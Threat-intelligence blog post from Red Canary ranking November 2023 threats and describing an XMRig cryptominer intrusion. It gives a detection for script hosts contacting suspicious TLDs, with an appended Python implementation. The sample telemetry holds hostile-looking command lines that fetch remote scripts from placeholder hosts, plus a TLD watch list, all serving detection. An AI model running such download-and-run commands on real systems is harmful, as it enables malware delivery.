
Intelligence Insights: December 2023

SocGholish, XMRig, and Cobalt Strike make their way up the chimney in this month’s edition of Intelligence Insights

The Red Canary Team

Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.

Highlights

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months. 

Here’s how the numbers shook out for November 2023:

Last month's rank | Threat name | Threat description
--- | --- | ---
1 | | Collection of Python classes to construct/manipulate network protocols
➡ 2 | | Open source tool that dumps credentials using various techniques
3 | SocGholish | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code
4 | | Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects
5* | Cobalt Strike | Penetration testing tool that integrates functionality from multiple offensive security projects and has the ability to extend its functionality with a native scripting language
5* | | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives
5* | LummaC2 | Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads
5* | NetSupport Manager | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access
9* | BloodHound | Open source tool used to identify attack paths and relationships in Active Directory
9* | Charcoal Stork | Suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper
9* | | Penetration testing framework used to probe systematic vulnerabilities on networks and servers and conduct post-exploitation activity on compromised hosts
9* | | Activity cluster using a worm spread by external drives that leverages Windows Installer to download malicious files
9* | RedLine | Information stealer sold on underground forums and used by a variety of adversaries
9* | | Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems
9* | XMRig | Monero cryptocurrency miner that is often deployed as a secondary payload

↑ = trending up from previous month
↓ = trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Observations on trending threats

Our top 10 threats this month ended up being a top 16, with an atypical 7-way tie for 9th place. SocGholish was more active this month, moving up to 3rd after placing just off the list at no. 11 last month. This is the highest SocGholish has been in the top 10 since April 2023. Cobalt Strike also saw an increase in activity that landed it in a 4-way tie for the 5th spot. Major U.S. holidays are often an active time for adversaries, and we saw a jump in both attempted Cobalt Strike use and BloodHound use during the week of Thanksgiving this year.

The reindeer games are XMRigged

One of our 9th place ties is XMRig, a Monero cryptocurrency miner, making its first appearance in our top 10. We typically see a few instances of XMRig every month, and saw enough in November for it to squeak into the top 10 list. XMRig by itself is a fairly benign open source miner available on GitHub. While, like all cryptominers, it uses system resources for its mining activity, it does not contain any additional malicious code.

Sometimes deploying XMRig is the adversary’s primary goal, but frequently XMRig is deployed as a secondary payload in an attempt to monetize threat actors’ access to victim systems. In November 2023 alone, researchers reported campaigns deploying XMRig alongside other malware families like Rhadamanthys and Cobalt Strike.

Here at Red Canary we saw XMRig delivered multiple ways last month. One example was very similar to activity reported by the DFIR Report in 2022. We assess the adversary likely brute-forced access to a public-facing MySQL server and then uploaded malicious DLLs and a custom loadable function to execute the DLLs. The adversary wrote a number of additional files to disk, including a renamed instance of cscript.exe, the XMRig binary, and additional scripts used to install and execute XMRig. They also created a scheduled task for persistence.

Detecting XMRig depends on how it is delivered. In the above example we saw at Red Canary, unusual cscript.exe activity gives us a detection opportunity.

Detection opportunity: Windows Script Host wscript.exe or cscript.exe making network connections to a suspicious top-level domain (TLD)

The following pseudo-detection analytic identifies wscript.exe or cscript.exe making network connections to a suspicious top-level domain (TLD). Malicious scripts, like those used in the example above to install XMRig, may connect to infrastructure hosted on unusual TLDs. This is atypical behavior, although custom admin scripts may reach out to personal domains. The analytic below leverages a custom-made suspicious domain list, based on observations and research on abused TLDs shared by teams like Unit 42.

process == (wscript, cscript)

&&

has_netconn

&&

command_includes (domain strings matching *suspicious_tlds)

Note: You can create a list of suspicious TLDs to reference in *suspicious_tlds based on in-house observations and industry research. The Red Canary list includes: .date, .cf, .ga, .casa, .cyou, among others.
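The pseudo-analytic above, implemented as an added example over constructed process telemetry (this is not Red Canary's detection code). The event fields, helper names and sample hostnames are assumptions; the TLD list is the five the post names.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Watch list of abused TLDs: the five named in the post, to be extended
# from in-house observations and published TLD-abuse research.
SUSPICIOUS_TLDS = {"date", "cf", "ga", "casa", "cyou"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Hostnames embedded in a command line, bare or inside a URL argument.
DOMAIN_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.I)

@dataclass
class ProcessEvent:            # assumed shape of an EDR process record
    image: str                 # image path as the sensor reports it
    cmdline: str               # full command line of the process
    has_netconn: bool          # sensor saw an outbound connection from it

def suspicious_domains(cmdline: str) -> list[str]:
    """Domains in the command line whose TLD is on the watch list."""
    hits = []
    for domain in DOMAIN_RE.findall(cmdline):
        if domain.rsplit(".", 1)[-1].lower() in SUSPICIOUS_TLDS:
            hits.append(domain.lower())
    return hits

def matches_analytic(event: ProcessEvent) -> bool:
    """process in (wscript, cscript) && has_netconn && suspicious TLD in cmdline."""
    name = PureWindowsPath(event.image).name.lower()   # path- and case-insensitive
    return (name in SCRIPT_HOSTS and event.has_netconn
            and bool(suspicious_domains(event.cmdline)))

def run_analytic(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Return the events that satisfy all three conditions."""
    return [e for e in events if matches_analytic(e)]

# Constructed sample telemetry; hostnames are invented placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cscript.exe",
                 r"cscript.exe //B //Nologo C:\Users\Public\inst.js http://cdn.update-mirror.date/x.txt", True),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",      # admin script, ordinary TLD
                 r"wscript.exe C:\Scripts\inventory.vbs https://intranet.example.com/api", True),
    ProcessEvent(r"C:\Windows\System32\cscript.exe",      # suspicious TLD, no connection seen
                 r"cscript.exe C:\Temp\run.vbs fonts.free-pack.casa", False),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # not a script host
                 r"powershell.exe -c iwr http://dl.setup-host.cyou/a.ps1", True),
]

if __name__ == "__main__":
    for hit in run_analytic(SAMPLE_EVENTS):
        print(f"ALERT {hit.image}: {suspicious_domains(hit.cmdline)}")
```

Because the analytic keys on the reported image name, the renamed cscript.exe copy mentioned above would slip past it; covering that case needs a check on the PE original filename or hash, which this example leaves out.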
